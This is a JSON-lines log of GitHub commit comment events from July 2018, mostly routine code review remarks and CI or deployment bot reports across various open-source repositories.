{"id":"8038851436","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"tp6m3bj6/X-Village-HW1"},"payload":{"comment":{"id":29890152,"position":56,"line":74,"path":"Complete.py","commit_id":"3a087c45e5a6afcef13cb18e647a60d9bba32f40","created_at":"2018-07-30T16:31:33Z","updated_at":"2018-07-30T16:31:33Z","author_association":"NONE","body":"這種字串格式化的方法是比較舊的 style，\r\n現在一般會使用 `format`\r\nhttps://docs.python.org/3/library/stdtypes.html#str.format"}},"created_at":"2018-07-30T16:31:33Z"}
{"id":"8038851836","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29890154,"position":null,"line":null,"path":null,"commit_id":"bf4326d4d97c3998c3771ff367df43740c184baf","created_at":"2018-07-30T16:31:38Z","updated_at":"2018-07-30T16:31:38Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-MacOS-10.9-clang: OK (2941 of 2954 tests passed, 1 test warnings)\n\nMessages:\n\n * 14 tests had: EIO diffs.\n * 11 tests had: ESO big diffs.\n * 12 tests had: Table big diffs.\n * 3 tests had: ERR diffs.\n * 8 tests had: MTR big diffs.\n * 3 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 611\n * Failed: 13\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bf4326d4d97c3998c3771ff367df43740c184baf-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.56%25-yellow.png)</a> \n"}},"created_at":"2018-07-30T16:31:38Z"}
{"id":"8038859490","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29890164,"position":null,"line":null,"path":null,"commit_id":"160e10fde60c834c600453f8595aff08b90db0d4","created_at":"2018-07-30T16:33:00Z","updated_at":"2018-07-30T16:33:00Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1030](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1030).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1030-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-30T16:33:00Z"}
{"id":"8038873435","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890187,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:35:28Z","updated_at":"2018-07-30T16:35:28Z","author_association":"MEMBER","body":"@flyinghead This just seems to make the OIT Reicast core crash for me at startup. Non-OIT still seems to work though."}},"created_at":"2018-07-30T16:35:28Z"}
{"id":"8038876998","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"tp6m3bj6/X-Village-HW1"},"payload":{"comment":{"id":29890197,"position":67,"line":116,"path":"Complete.py","commit_id":"3a087c45e5a6afcef13cb18e647a60d9bba32f40","created_at":"2018-07-30T16:36:05Z","updated_at":"2018-07-30T16:36:05Z","author_association":"NONE","body":"一般來說，會使用 `is not None` 而不是 `!= None`\r\nreference: https://www.python.org/dev/peps/pep-0008/#programming-recommendations"}},"created_at":"2018-07-30T16:36:05Z"}
{"id":"8038877221","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29890198,"position":null,"line":null,"path":null,"commit_id":"7344a0311a788ab7366805a89b5ccc4d73ed8aa6","created_at":"2018-07-30T16:36:08Z","updated_at":"2018-07-30T16:36:08Z","author_association":"CONTRIBUTOR","body":"Fair enough, looks like the right choice for cbor.\r\n\r\nMaybe upon boot we should have a check and a helpful warning/import wizard? "}},"created_at":"2018-07-30T16:36:08Z"}
{"id":"8038879316","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29890205,"position":null,"line":null,"path":null,"commit_id":"bb8b4fd326397c8c5dbed49311e5e53dee459c75","created_at":"2018-07-30T16:36:28Z","updated_at":"2018-07-30T16:36:28Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-56](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-56-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-30T16:36:28Z"}
{"id":"8038883717","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"tp6m3bj6/X-Village-HW1"},"payload":{"comment":{"id":29890217,"position":69,"line":118,"path":"Complete.py","commit_id":"3a087c45e5a6afcef13cb18e647a60d9bba32f40","created_at":"2018-07-30T16:37:15Z","updated_at":"2018-07-30T16:37:15Z","author_association":"NONE","body":"`else` 內的 statement 只有 `pass`，那其實可以不用把 `else` 給寫出來"}},"created_at":"2018-07-30T16:37:15Z"}
{"id":"8038888054","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29890230,"position":null,"line":null,"path":null,"commit_id":"0ee158d4b5635dd27efcc65e4f19619b4a76abee","created_at":"2018-07-30T16:38:02Z","updated_at":"2018-07-30T16:38:02Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T16:38:02Z"}
{"id":"8038894272","type":"CommitCommentEvent","actor":{"login":"adonisgarcia"},"repo":{"name":"ccem-dev/otus-domain"},"payload":{"comment":{"id":29890246,"position":14,"line":86,"path":"otus-domain/app/project/fieldCenter/center-card/center-card-template.html","commit_id":"0fe29f157719139e9f9a07f811d8a611e08a5831","created_at":"2018-07-30T16:39:13Z","updated_at":"2018-07-30T16:39:13Z","author_association":"MEMBER","body":"Alterado. "}},"created_at":"2018-07-30T16:39:13Z"}
{"id":"8038894434","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29890247,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-30T16:39:14Z","updated_at":"2018-07-30T16:39:14Z","author_association":"CONTRIBUTOR","body":"Do you have other error message around the one you provided ? Else if you replace `__func__` by `\"\"` ?\r\n It's definitively compiling on linux…"}},"created_at":"2018-07-30T16:39:14Z"}
{"id":"8038895536","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29890250,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T16:39:27Z","updated_at":"2018-07-30T16:39:27Z","author_association":"CONTRIBUTOR","body":"Note: if you just change the calls to wxMacGetGenericRGBColorSpace in src/osx/core/bitmap.cpp to use the old value, then my drawing works perfectly and the rest of the UI controls look correct on Mojave dark mode.   That said, I would instead create a new wxMacGetRecommendedColorSpace that uses the new SRGB value and change all the OTHER ocurances of wxMacGetGenericRGBColorSpace to use that instead."}},"created_at":"2018-07-30T16:39:27Z"}
{"id":"8038895569","type":"CommitCommentEvent","actor":{"login":"alexuzcateg"},"repo":{"name":"alexuzcateg/hello-world"},"payload":{"comment":{"id":29890251,"position":2,"line":2,"path":"README.md","commit_id":"4f9119a28e38a86b1e0dff18c2d7337e6008278b","created_at":"2018-07-30T16:39:27Z","updated_at":"2018-07-30T16:39:27Z","author_association":"OWNER","body":"With a branch modification..."}},"created_at":"2018-07-30T16:39:27Z"}
{"id":"8038896006","type":"CommitCommentEvent","actor":{"login":"adonisgarcia"},"repo":{"name":"ccem-dev/otus-domain"},"payload":{"comment":{"id":29890253,"position":6,"line":40,"path":"otus-domain/package.json","commit_id":"cccc513018f650afe6a1cd309d0decaad8a44744","created_at":"2018-07-30T16:39:32Z","updated_at":"2018-07-30T16:39:32Z","author_association":"MEMBER","body":"Alterado."}},"created_at":"2018-07-30T16:39:32Z"}
{"id":"8038899244","type":"CommitCommentEvent","actor":{"login":"neimengwuyanzu"},"repo":{"name":"neimengwuyanzu/CriminalIntent_CA"},"payload":{"comment":{"id":29890262,"position":null,"line":null,"path":null,"commit_id":"09943a480b388991e06dc860a1b4619d85c9f34d","created_at":"2018-07-30T16:40:01Z","updated_at":"2018-07-30T16:40:01Z","author_association":"OWNER","body":"传点代码真他妈费劲"}},"created_at":"2018-07-30T16:40:01Z"}
{"id":"8038909195","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890284,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:41:44Z","updated_at":"2018-07-30T16:41:44Z","author_association":"MEMBER","body":"Let me doublecheck if this is the culprit, it might be something else."}},"created_at":"2018-07-30T16:41:44Z"}
{"id":"8038909420","type":"CommitCommentEvent","actor":{"login":"subsite"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29890285,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-30T16:41:47Z","updated_at":"2018-07-30T16:41:47Z","author_association":"NONE","body":"Is this compatible with MK2.5?"}},"created_at":"2018-07-30T16:41:47Z"}
{"id":"8038909900","type":"CommitCommentEvent","actor":{"login":"krOoze"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":29890286,"position":41,"line":3428,"path":"chapters/synchronization.txt","commit_id":"ff0c2339083b76aba0414afafdb195bba15c78d8","created_at":"2018-07-30T16:41:52Z","updated_at":"2018-07-30T16:41:52Z","author_association":"CONTRIBUTOR","body":"-> #756"}},"created_at":"2018-07-30T16:41:52Z"}
{"id":"8038910542","type":"CommitCommentEvent","actor":{"login":"juansanzone"},"repo":{"name":"mercadopago/px-ios"},"payload":{"comment":{"id":29890288,"position":5,"line":15,"path":"MercadoPagoSDK/MercadoPagoSDK/MercadoPagoUIViewController.swift","commit_id":"edee57aebe0fc54ce9710a8d3c8fd26a6d698ace","created_at":"2018-07-30T16:41:59Z","updated_at":"2018-07-30T16:41:59Z","author_association":"COLLABORATOR","body":"hacela private si podes @tomidelucca. Y porque el ; ?"}},"created_at":"2018-07-30T16:41:59Z"}
{"id":"8038914110","type":"CommitCommentEvent","actor":{"login":"juansanzone"},"repo":{"name":"mercadopago/px-ios"},"payload":{"comment":{"id":29890301,"position":5,"line":15,"path":"MercadoPagoSDK/MercadoPagoSDK/MercadoPagoUIViewController.swift","commit_id":"edee57aebe0fc54ce9710a8d3c8fd26a6d698ace","created_at":"2018-07-30T16:42:40Z","updated_at":"2018-07-30T16:42:40Z","author_association":"COLLABORATOR","body":"Ah, y sería sin k. Porque a swiftlint no le gusta"}},"created_at":"2018-07-30T16:42:40Z"}
{"id":"8038915759","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_helium"},"payload":{"comment":{"id":29890305,"position":5,"line":32,"path":"overlay-lineage/frameworks/base/core/res/res/values/config.xml","commit_id":"281c86b70ed90cef6b325bca6828e98819a46c6b","created_at":"2018-07-30T16:42:59Z","updated_at":"2018-07-30T16:42:59Z","author_association":"MEMBER","body":"Why adding Smart Pixels overlay then"}},"created_at":"2018-07-30T16:42:59Z"}
{"id":"8038915780","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29890306,"position":null,"line":null,"path":null,"commit_id":"53d7e23c461b3ad3a986a8a1b1c995a2f45de1b7","created_at":"2018-07-30T16:42:59Z","updated_at":"2018-07-30T16:42:59Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/103/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/103//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53d7e23c461b3ad3a986a8a1b1c995a2f45de1b7/103/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53d7e23c461b3ad3a986a8a1b1c995a2f45de1b7/103/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53d7e23c461b3ad3a986a8a1b1c995a2f45de1b7/103/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/53d7e23c461b3ad3a986a8a1b1c995a2f45de1b7/103/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * System/iOS Unified 64-bits - simulator/Debug: Failed\n"}},"created_at":"2018-07-30T16:42:59Z"}
{"id":"8038916552","type":"CommitCommentEvent","actor":{"login":"patovala"},"repo":{"name":"mepineda1992/etherchain-light"},"payload":{"comment":{"id":29890307,"position":6,"line":64,"path":".gitignore","commit_id":"263c8f60f57978e7b3d6d8a0e1be969490d256fa","created_at":"2018-07-30T16:43:09Z","updated_at":"2018-07-30T16:43:09Z","author_association":"COLLABORATOR","body":"why?"}},"created_at":"2018-07-30T16:43:09Z"}
{"id":"8038918340","type":"CommitCommentEvent","actor":{"login":"trytoforget"},"repo":{"name":"trytoforget/kidtoyshop.github.io"},"payload":{"comment":{"id":29890311,"position":null,"line":null,"path":null,"commit_id":"0450206673e8df210cd4f88304f0f9e1c7a349a7","created_at":"2018-07-30T16:43:29Z","updated_at":"2018-07-30T16:43:29Z","author_association":"OWNER","body":"![0](https://user-images.githubusercontent.com/41801227/43410790-517f9fdc-9452-11e8-9b6a-c68b8ecceaf2.jpg)\r\n"}},"created_at":"2018-07-30T16:43:29Z"}
{"id":"8038918361","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29890312,"position":null,"line":null,"path":null,"commit_id":"07924a9b0ec83474d8dda97b26bb8f5bcaa64d44","created_at":"2018-07-30T16:43:29Z","updated_at":"2018-07-30T16:43:29Z","author_association":"COLLABORATOR","body":"> i'm regretting manually inputting all of this\r\n\r\nAutomate! Automate! :)\r\n"}},"created_at":"2018-07-30T16:43:29Z"}
{"id":"8038922047","type":"CommitCommentEvent","actor":{"login":"trytoforget"},"repo":{"name":"trytoforget/kidtoyshop.github.io"},"payload":{"comment":{"id":29890325,"position":null,"line":null,"path":null,"commit_id":"0450206673e8df210cd4f88304f0f9e1c7a349a7","created_at":"2018-07-30T16:44:12Z","updated_at":"2018-07-30T16:44:12Z","author_association":"OWNER","body":"![icon](https://user-images.githubusercontent.com/41801227/43410830-746bd344-9452-11e8-988c-0379fffd309a.png)\r\n"}},"created_at":"2018-07-30T16:44:12Z"}
{"id":"8038922470","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29890327,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T16:44:17Z","updated_at":"2018-07-30T16:44:17Z","author_association":"NONE","body":"At some point I noticed that `ctrl-d` stopped working, which I never used in neovim before I discovered this plugin, but I quickly got used to it, so adding `let g:VM_sublime_mappings = 1` brought the mapping back, and it's fine now.\r\n\r\nThanks for the links! And don't be sorry: even though I'm using only a tiny bit of the functionality, I very much appreciate your efforts that you put into this project. It's a superb job that you're doing."}},"created_at":"2018-07-30T16:44:17Z"}
{"id":"8038923849","type":"CommitCommentEvent","actor":{"login":"Ramsis-SNES"},"repo":{"name":"Ramsis-SNES/furryrpg"},"payload":{"comment":{"id":29890330,"position":null,"line":null,"path":null,"commit_id":"66ba4e6917c3dd1875e7720f9e52c5d967515605","created_at":"2018-07-30T16:44:33Z","updated_at":"2018-07-30T16:44:33Z","author_association":"OWNER","body":"Note that this currently breaks compatibility (at least) with the SD2SNES and SNES PowerPak, and possibly other flashcarts as well. SD2SNES will be fixed in v1.8.1 (via commit ee097b34f2391893de6296640a76f4d59a6b0e68), and a rework of the PowerPak's rather silly ROM type detection is in the works. ;-)\r\n\r\nAlso note that the 48 Mbit expansion forced me to dabble into C++ programming, which I've never done before. So, please excuse the crudity of tools/fix_chsum_exhirom_48mbit.cc – for a very beginner, I'm just happy that it works as intended! :D"}},"created_at":"2018-07-30T16:44:33Z"}
{"id":"8038928889","type":"CommitCommentEvent","actor":{"login":"yuu143"},"repo":{"name":"Somali-Developer/sheeko365"},"payload":{"comment":{"id":29890341,"position":null,"line":null,"path":null,"commit_id":"4c410222278748f1b58c9eb2ff232a11dd496a10","created_at":"2018-07-30T16:45:30Z","updated_at":"2018-07-30T16:45:30Z","author_association":"NONE","body":"Mashaa allah, mahadsanid in badan ustad "}},"created_at":"2018-07-30T16:45:30Z"}
{"id":"8038932235","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29890348,"position":null,"line":null,"path":null,"commit_id":"a909282ebf78882879d98db5ea07bca76c3541a8","created_at":"2018-07-30T16:46:06Z","updated_at":"2018-07-30T16:46:06Z","author_association":"NONE","body":"First i thought my version could give 5 elo but meanwhile nearly at the end of the run its shrink to 2 elo. This is in the error margin. My other tests are worse. And your version seems neutral against SF 7.\r\nSo i abort this topic if no new idea pop ups."}},"created_at":"2018-07-30T16:46:06Z"}
{"id":"8038932926","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29890350,"position":20,"line":10723,"path":"src/game/Entities/Unit.cpp","commit_id":"f61fb6689de37165505cb3ee178ec090b016f8c4","created_at":"2018-07-30T16:46:12Z","updated_at":"2018-07-30T16:46:12Z","author_association":"CONTRIBUTOR","body":"The threat changes were modelled after sniffs. As you know, wotlk+ packets are sent for the specific operations, and getting Mind controlled by for example kaelthas, provides you with a full threat wipe, and the strategy guides do mention that as well.\r\n\r\nThe starting position changes were an attempt to untangle a web of bad resetting, which lead to AI getting stuck. Even after these changes, its still not yet blizzlike, because I don't have yet dotted down what should happen to a mob, when its lets say 500 yards from spawn, and it evades from combat with its aggressor."}},"created_at":"2018-07-30T16:46:12Z"}
{"id":"8038933572","type":"CommitCommentEvent","actor":{"login":"patovala"},"repo":{"name":"mepineda1992/etherchain-light"},"payload":{"comment":{"id":29890352,"position":1,"line":1,"path":"docker-compose.yml.old","commit_id":"263c8f60f57978e7b3d6d8a0e1be969490d256fa","created_at":"2018-07-30T16:46:20Z","updated_at":"2018-07-30T16:46:20Z","author_association":"COLLABORATOR","body":"let's remove this whole file"}},"created_at":"2018-07-30T16:46:20Z"}
{"id":"8038934931","type":"CommitCommentEvent","actor":{"login":"igorgue"},"repo":{"name":"breadwallet/breadwallet-core"},"payload":{"comment":{"id":29890354,"position":62,"line":606,"path":"BRTransaction.c","commit_id":"0ea0d7d34879a860718582bbf8324949ee038cab","created_at":"2018-07-30T16:46:34Z","updated_at":"2018-07-30T16:46:34Z","author_association":"NONE","body":"Hi @voisine I know this is old but did you mean to say here `(size + witSize + 3)/4;` instead? That's what I understand form https://github.com/bitcoin/bips/blob/master/bip-0141.mediawiki#transaction-size-calculations\r\n\r\nThank you!"}},"created_at":"2018-07-30T16:46:34Z"}
{"id":"8038935389","type":"CommitCommentEvent","actor":{"login":"tehn"},"repo":{"name":"monome/teletype"},"payload":{"comment":{"id":29890357,"position":null,"line":null,"path":null,"commit_id":"eb3976534db0df122628f3910673f5b052e8d8ad","created_at":"2018-07-30T16:46:39Z","updated_at":"2018-07-30T16:46:39Z","author_association":"MEMBER","body":"@trentgill @scanner-darkly \r\n\r\nare there files missing from this merge? a fresh clone of the tt repo no longer compiles."}},"created_at":"2018-07-30T16:46:39Z"}
{"id":"8038936648","type":"CommitCommentEvent","actor":{"login":"mg979"},"repo":{"name":"mg979/vim-visual-multi"},"payload":{"comment":{"id":29890362,"position":null,"line":null,"path":null,"commit_id":"d57e4a77c79d641746d6f5a441c5d342d23fc142","created_at":"2018-07-30T16:46:53Z","updated_at":"2018-07-30T16:46:53Z","author_association":"OWNER","body":"Thanks, that's encouraging :)"}},"created_at":"2018-07-30T16:46:53Z"}
{"id":"8038943962","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890374,"position":52,"line":2045,"path":"java/rocksjni/rocksjni.cc","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T16:48:11Z","updated_at":"2018-07-30T16:48:11Z","author_association":"OWNER","body":"This method signature needs to be checked!"}},"created_at":"2018-07-30T16:48:11Z"}
{"id":"8038945496","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29890376,"position":null,"line":null,"path":null,"commit_id":"7571a5c1f2ebfe4d7c39098a448ba7274ab3ca61","created_at":"2018-07-30T16:48:28Z","updated_at":"2018-07-30T16:48:28Z","author_association":"CONTRIBUTOR","body":"If you compare spell ID 770 (player faerie fire) in 1.12.1 and 2.4.3, you will see that TBC is missing two SPELL_AURA_DISPEL_IMMUNITY effects, which were not replaced by any serverside mechanisms. This was later reimplemented as an aurastate. The DISPEL_STEALTH and DISPEL_INVISIBILITY are the two effects which exist in vanilla, and thus the code in core was redundant, and I think it might be due to the history of how the cores came to be."}},"created_at":"2018-07-30T16:48:28Z"}
{"id":"8038946211","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29890378,"position":null,"line":null,"path":null,"commit_id":"4720f1c21d7103f206214eeac48d43182a50bc92","created_at":"2018-07-30T16:48:35Z","updated_at":"2018-07-30T16:48:35Z","author_association":"OWNER","body":"\r\nFirst i thought my version could give 5 elo but meanwhile  nearly at the end of the run its shrink to 2 elo. This is in the error  margin. My other tests are worse. So i abort this topic if no new idea pop ups.\r\n\r\n\r\n"}},"created_at":"2018-07-30T16:48:35Z"}
{"id":"8038948338","type":"CommitCommentEvent","actor":{"login":"digitalinfinity"},"repo":{"name":"Microsoft/ChakraCore"},"payload":{"comment":{"id":29890382,"position":5,"line":4546,"path":"lib/Runtime/ByteCode/ByteCodeSerializer.cpp","commit_id":"e16792c186ef7a88f8a6be4a7045f5ca6a6405dd","created_at":"2018-07-30T16:48:58Z","updated_at":"2018-07-30T16:48:58Z","author_association":"MEMBER","body":"Someone needs to look more closely into this assert and the one on 4550. The latter is more lax, this one is more strict. I would assume they would have to be equivalent in the case that property count is 0, but they're not. I don't know which one is correct 😛 "}},"created_at":"2018-07-30T16:48:58Z"}
{"id":"8038949665","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890386,"position":94,"line":94,"path":"java/src/main/java/org/rocksdb/CompactRangeOptions.java","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T16:49:12Z","updated_at":"2018-07-30T16:49:12Z","author_association":"OWNER","body":"The following methods need to be implemented / converted to JNI calls."}},"created_at":"2018-07-30T16:49:12Z"}
{"id":"8038951863","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890389,"position":93,"line":93,"path":"java/src/main/java/org/rocksdb/CompactRangeOptions.java","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T16:49:37Z","updated_at":"2018-07-30T16:49:37Z","author_association":"OWNER","body":"The following methods need to be implemented / converted to JNI calls."}},"created_at":"2018-07-30T16:49:37Z"}
{"id":"8038953081","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890393,"position":94,"line":94,"path":"java/src/main/java/org/rocksdb/CompactRangeOptions.java","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T16:49:50Z","updated_at":"2018-07-30T16:49:50Z","author_association":"OWNER","body":"typo"}},"created_at":"2018-07-30T16:49:50Z"}
{"id":"8038954051","type":"CommitCommentEvent","actor":{"login":"christian-esken"},"repo":{"name":"christian-esken/rocksdb"},"payload":{"comment":{"id":29890396,"position":147,"line":147,"path":"java/src/main/java/org/rocksdb/CompactRangeOptions.java","commit_id":"ddc0e94fe1ef589a4afdd5b0ba8e150e6e32dbd2","created_at":"2018-07-30T16:50:01Z","updated_at":"2018-07-30T16:50:01Z","author_association":"OWNER","body":"The following methods need to be implemented / converted to JNI calls."}},"created_at":"2018-07-30T16:50:01Z"}
{"id":"8038958735","type":"CommitCommentEvent","actor":{"login":"mepineda1992"},"repo":{"name":"mepineda1992/etherchain-light"},"payload":{"comment":{"id":29890402,"position":6,"line":64,"path":".gitignore","commit_id":"263c8f60f57978e7b3d6d8a0e1be969490d256fa","created_at":"2018-07-30T16:50:56Z","updated_at":"2018-07-30T16:50:56Z","author_association":"OWNER","body":"That is part to the last version. We will change that"}},"created_at":"2018-07-30T16:50:56Z"}
{"id":"8038960970","type":"CommitCommentEvent","actor":{"login":"SaintHellcom"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29890404,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T16:51:16Z","updated_at":"2018-07-30T16:51:16Z","author_association":"NONE","body":"Pls Help\r\n\r\n![bug01](https://user-images.githubusercontent.com/41921497/43411099-7dd0837c-9429-11e8-9127-5954588789e3.png)\r\n"}},"created_at":"2018-07-30T16:51:16Z"}
{"id":"8038961648","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890407,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:51:23Z","updated_at":"2018-07-30T16:51:23Z","author_association":"NONE","body":"Yeah I don't think this change could make the renderer crash."}},"created_at":"2018-07-30T16:51:23Z"}
{"id":"8038965426","type":"CommitCommentEvent","actor":{"login":"OGFris"},"repo":{"name":"SpecterTeam/EasyPets"},"payload":{"comment":{"id":29890410,"position":null,"line":null,"path":null,"commit_id":"d4aae0f94686cc6c5f649a9f5f0f402c512441cf","created_at":"2018-07-30T16:52:05Z","updated_at":"2018-07-30T16:52:05Z","author_association":"MEMBER","body":"@SOF3 [Fixed](https://github.com/SpecterTeam/EasyPets/commit/6f0a37aa238b6acfe7be65811e1bd8c905c8ebeb)"}},"created_at":"2018-07-30T16:52:05Z"}
{"id":"8038965606","type":"CommitCommentEvent","actor":{"login":"ooxi"},"repo":{"name":"eteran/cpp-utilities"},"payload":{"comment":{"id":29890411,"position":null,"line":null,"path":null,"commit_id":"59753178b3fcb488ac865b3a48c066b6b474ed0b","created_at":"2018-07-30T16:52:07Z","updated_at":"2018-07-30T16:52:07Z","author_association":"CONTRIBUTOR","body":"Thank you very much, I was literally about to make a pull request for `constexpr` constructor!"}},"created_at":"2018-07-30T16:52:07Z"}
{"id":"8038969860","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29890417,"position":null,"line":null,"path":null,"commit_id":"621b08c96eb94d3891c41da7df56b86912beb7b6","created_at":"2018-07-30T16:52:54Z","updated_at":"2018-07-30T16:52:54Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-568](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-568).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-568-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-30T16:52:54Z"}
{"id":"8038971119","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29890421,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T16:53:10Z","updated_at":"2018-07-30T16:53:10Z","author_association":"NONE","body":"Actually this scaling should be done inside the !pvrrc.isRTT case. I think I changed it in the OIT branch but not in my master.\r\nSo change to a division but leave them inside the `if (!pvrrc.isRTT) {`"}},"created_at":"2018-07-30T16:53:10Z"}
